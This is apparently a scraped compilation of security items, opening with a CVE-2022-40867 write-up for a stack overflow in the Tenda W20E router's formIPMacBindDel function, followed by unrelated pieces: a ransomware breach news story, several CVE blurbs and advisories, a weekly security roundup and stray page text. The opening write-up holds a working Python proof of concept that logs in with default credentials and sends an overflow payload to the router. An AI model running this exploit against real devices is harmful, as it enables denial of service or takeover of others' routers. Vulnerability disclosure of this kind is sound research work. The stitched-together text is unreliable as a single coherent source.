Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formIPMacBindDel with the request /goform/delIpMacBind/

**\* Tenda W20E stack vulnerability****\* Version**

V15.11.0.6 (US\_W20EV4.0br\_V15.11.0.6(1068\_1546\_841)\_CN\_TDC)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2707.html

**\* Vulnerability Detail**

In function formIPMacBindDel, the content obtained by the program from the parameter "IPMacBindIndex" is passed to \_\_src, and then the \_\_src is directly copied into the indexs stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formIPMacBindDel(webs\_t wp,char \*path,char \*query)

{
  char \*\_\_src;
  char msg \[512\];
  char out \[64\];
  char indexs \[128\];
  int i;
  int n;
  char \*indexSet;
  
  memset(indexs,0,0x80);
  out.\_0\_4\_ = 0x31;
  memset(out + 4,0,0x3c);
  msg.\_0\_4\_ = 0;
  memset(msg + 4,0,0x1fc);
  \_\_src = websGetVar(wp,"IPMacBindIndex","0");
  strcpy(indexs,\_\_src); //here is overflow
  delete\_rules\_in\_list("security.ipbind.list",indexs,"\\t");
  sprintf(msg,"op=%d",5);
  send\_msg\_to\_netctrl(0xb,msg);
  CommitCfm();
  outputToWebs(wp,out);
  return;
}

**\* POC**

import requests

cmd  \= b'IPMacBindIndex=' + b'A' \* 800 

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/delIpMacBind/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40867: Router-vuls/formIPMacBindDel.md at main · CPSeek/Router-vuls

By Waqas
The company maintains that it was able to “detect and stop” the “sophisticated ransomware attack” on February 26,…
This is a post from HackRead.com Read the original post: Ransomware attack on US healthcare debt collector exposes 1.9m patient records

****The company maintains that it was able to “detect and stop” the “sophisticated ransomware attack” on February 26, 2022, while the impacted healthcare providers were noticed in May 2022****

A ransomware attack on a healthcare debt collector has potentially exposed the records of 1.9 million patients. The attack, which occurred in Colorado against Professional Finance Company (PFC), involved the installation of ransomware on the debt collector’s computer systems.

Furthermore, the ransomware encrypted the data on the systems, preventing it from being accessed. As a result of the attack, the debt collector was forced to shut down its computer systems. The company maintains that it was able to “detect and stop” the “sophisticated ransomware attack” on February 26, 2022, while the impacted healthcare providers were noticed in May 2022.

It is worth noting that this is not the first time when a US-based medical debt collector has suffered a ransomware attack. In August 2020, R1 RCM, formerly Accretive Health Inc., one of the largest medical debt collection firms in the United States, was hit by a major ransomware attack.

> PFC immediately engaged third-party forensic specialists to assist us with securing the network environment and investigating the extent of any unauthorized activity while Federal law enforcement was also notified.
> 
> Professional Finance Company (PFC)

**What Data is Impacted?**

According to PFC’s notice , for now, there is no evidence that the personal information has been “specifically misused” however it is quite a possibility that the attackers had access to victims’ PII data including the following:

*   Full names
*   Addresses
*   Date of Birth
*   Health Insurance Details
*   Accounts Receivable Balance
*   Medical Treatment Information
*   Social Security Numbers (SSN)
*   Information on Payments Made to Accounts

PFC is alerting victims of this data breach through letters. The company is also offering potentially involved individuals access to free credit monitoring and identity theft protection services.

**More Ransomware Attack News**

*   5 Biggest Ransomware Attacks of All Time
*   Swire Pacific Offshore Operations hit by Cl0p ransomware gang
*   Cl0p ransomware gang leaks sensitive data from 6 US universities
*   2,000 Colorado DOT computers infected with SamSam Ransomware
*   Cardiologist Charged for Developing Jigsaw v.2 and Thanos Ransomware

**Potential Dangers**

Healthcare data is a treasure trove for cybercriminals. Over the year, on numerous occasions, Hackread.com published exclusive reports on how crooks have been involved in selling healthcare and patients’ data on the dark web.

As for data stolen in PFC’s data breach, it could end up on cybercrime forums for sale or even as a free download and open wrath of scams including identify theft on already vulnerable patients.

It is important for individuals who may have been affected to take steps to protect their information. Anyone who believes they may be at risk should monitor their credit reports and credit score, and be vigilant for any suspicious activity. Additionally, they should consider placing a fraud alert on their credit file.

In conclusion, this incident is a major concern because the number of exposed victims. It could lead to identity theft and other malicious activities. Healthcare organizations and in this case, debt collector agencies, should take steps to protect themselves from ransomware attacks, and patients should be vigilant about their personal information.

In a conversation with Hackread.com, Neil Jones, Director of Cybersecurity Evangelism at Egnyte expressed their concerns over the incident as it could end up impacting unsuspecting victims.

“The recent data breach at Professional Finance Company is especially concerning because healthcare debt collection information inherently includes PII (Personally Identifiable Information) and PHI (Protected Health Information), which are treasure troves for cyber-attackers,” Jones said.

Jones emphasized that businesses and organizations must implement proper security measures to fight off ransomware attacks.

“Organisations need to combine ransomware detection solutions with effective data recovery programs. Companies need to have incident response plans in place, to effectively notify their customers, employees, business partners, and the news media of potential breaches. During these dynamic times, routine technological audits need to occur on a more frequent basis than they did before, to prevent vulnerabilities from being exploited,” Jones advised.

**More Healthcare Cyber Attacks**

*   Healthcare Clinic Suffers Ransomware Attack; 300K Patients Impacted
*   Authorities bust hacker group planning to hit hospitals with ransomware
*   Massive US Healthcare Company Hacked, 1.1 million customers affected
*   Hackers hit Europe’s largest healthcare provider with Snake ransomware
*   Personal data of 75,000 individuals exposed after HealthCare.gov system hack

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Ransomware attack on US healthcare debt collector exposes 1.9m patient records

An update for opencryptoki is now available for Red Hat Enterprise Linux 8.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-3798: openCryptoki: Soft token does not check if an EC key is valid


RHBA-2021:3054: Red Hat Bug Fix Advisory: opencryptoki bug fix and enhancement update

This affects the package glob-parent before 5.1.2. The enclosure regex used to check for strings ending in enclosure containing path separator.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-28469: fix: eliminate ReDoS by Trott · Pull Request #36 · gulpjs/glob-parent

CVE-2021-38137

In jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.

CVE-2022-2984

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

CVE-2022-24302: Changelog — Paramiko documentation

Plus: Details emerge of a US government social media-scanning tool that flags “derogatory” speech, and researchers find vulnerabilities in the global mobile communications network.

As the Israel-Hamas war raged on this week and Israel expanded its ground invasion of the Gaza Strip, the territory's compromised internet infrastructure and access to connectivity went fully dark on Friday, leaving Palestinians without access to ground or mobile data connections. Meanwhile, researchers are bracing for the fallout if Hamas makes good on its threats to distribute hostage execution videos online. And TikTokkers are using a niche livestreaming feature and exploiting the Israeli-Hamas conflict to collect virtual gifts from viewers, a portion of which goes to the social media company as a fee.

As the worst mass shooting in Maine's history unfolded this week and the gunman remained at large, disinformation about the situation and the suspect flooded social media, adding to the already chaotic and horrific situation. Elon Musk, the owner of X (formerly Twitter) posted remarks earlier this month mocking Ukrainian president Vlodymr Zelensky that were met with a flood of support and enthusiasm from Russian trolls and accounts distributing pro-Russia propaganda.

The US federal foreign intelligence collection tool—a frequently abused surveillance authority—known as Section 702 is facing its demise at the end of the year despite being viewed as the “crown jewel” of US surveillance powers. So far, no members of Congress have introduced a bill to prevent its January 1 sunset. And the identity-management platform Okta suffered a breach that had implications for nearly 200 of its corporate clients and brought up memories of a similar hack the company suffered last year that also had knock-on effects for customers.

An EU government body has been pushing a controversial proposal with far-reaching privacy implications in an attempt to combat child sexual abuse material, but its most outspoken advocates recently added to the drama significantly by essentially launching an influence campaign to support its passage. The long-foreseen nightmare of using generative AI to create digital child abuse materials has arrived with a flood of images, some of which are completely fabricated while others depict real victims generated from old datasets.

We also went deep this week on a situation in which hackers say they can crack a locked USB drive that contains a massive 7,002 bitcoins, worth about $235 million—but the drive's owner hasn't let them try.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

A cryptominer that never seemed to generate very much cryptocurrency for its creators is part of a larger digital espionage campaign, according to researchers from security firm Kaspersky Lab. The platform, which they call StripedFly, has infected more than 1 million Windows and Linux targets globally since 2017. StripedFly is modular and has multiple components for compromising targets' devices and collecting different types of data, indicating that it was likely created as part of a well-funded state espionage program, not a cybercriminal enterprise. It also includes an update mechanism so attackers can distribute improvements and new functionality to the malware.

StripedFly can, among other things, steal access credentials from compromised devices; take screenshots; grab databases, sensitive files, videos, or other information of interest; and record live audio by compromising a target's microphone. Notably, StripedFly uses an innovative, custom Tor client to mask communication and exfiltration between the malware and its command-and-control servers. It also has a ransomware component that attackers have occasionally deployed. It infects targets initially using a customized version of the notorious EternalBlue exploit leaked from the US National Security Agency.

Documents reviewed by 404 Media shed new light on US Immigration and Customs Enforcement’s scanning and database tool for identifying “derogatory” online speech about the US. Dubbed Giant Oak Search Technology (GOST), it assists ICE agents in scanning social media posts. According to the documents, they then use the findings in immigration enforcement actions.

One of the documents shows a GOST catchphrase, “We see the people behind the data,” and a user guide from the documents says GOST is “capable of providing behavioral-based internet search capabilities.” ICE agents can search the system for specific names, addresses, email addresses, and countries of citizenship. The documents say that “potentially derogatory social media can be reviewed within the interface.”

The world’s telephony networks have often been built on legacy infrastructure and with a convoluted maze of interconnections. The system enables mobile data access across much of the world, but its complexity and the collision of new and archaic technologies can lead to vulnerabilities. This week, University of Toronto’s Citizen Lab published extensive research on the degree to which roaming arrangements between mobile providers contain security issues that can be exploited to track devices, and by extension the people who own them. The flaw comes from a lack of protection on the communications between cell towers as you, for instance, travel on a train, ride a motorcycle, or walk around town. The concern is that governments, criminals, or other snoops can manipulate the weaknesses in these handoff communications to track device locations. “These vulnerabilities are most often tied to the signaling messages that are sent between telecommunications networks which expose the phones to different modes of location disclosure,” Citizen Lab researchers wrote.

This Cryptomining Tool Is Stealing Secrets

Zammad 5.2.0 is vulnerable to privilege escalation. Zammad has a prevention against brute-force attacks trying to guess login credentials. After a configurable amount of attempts, users are invalidated and logins prevented. An attacker might work around this prevention, enabling them to send more than the configured amount of requests before the user invalidation takes place.

Security Advisory

5\. Juli 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-07
*   Date: 07/05/2022
*   Title: Unauthorized Access
*   Severity: high
*   Product: Zammad 5.2.x
*   Fixed in: Zammad 5.2.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Unauthorized Access**

Zammad has a prevention against brute-force attacks trying to guess login credentials. After a configurable amount of attempts, users are invalidated and logins prevented. An attacker might work around this prevention, enabling them to send more than the configured amount of requests before the user invalidation takes place.

Special 🙏 and 🤘 and ❤️ to:

*   N: Joe Helle
*   W: https://themayor.tech/

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-07

Send all remarks on security issues to security@zammad.com.

CVE-2022-35490: Security Advisory ZAA-2022-07 | Zammad

The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly check nonce values in several actions, allowing an attacker to perform CSRF attacks.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us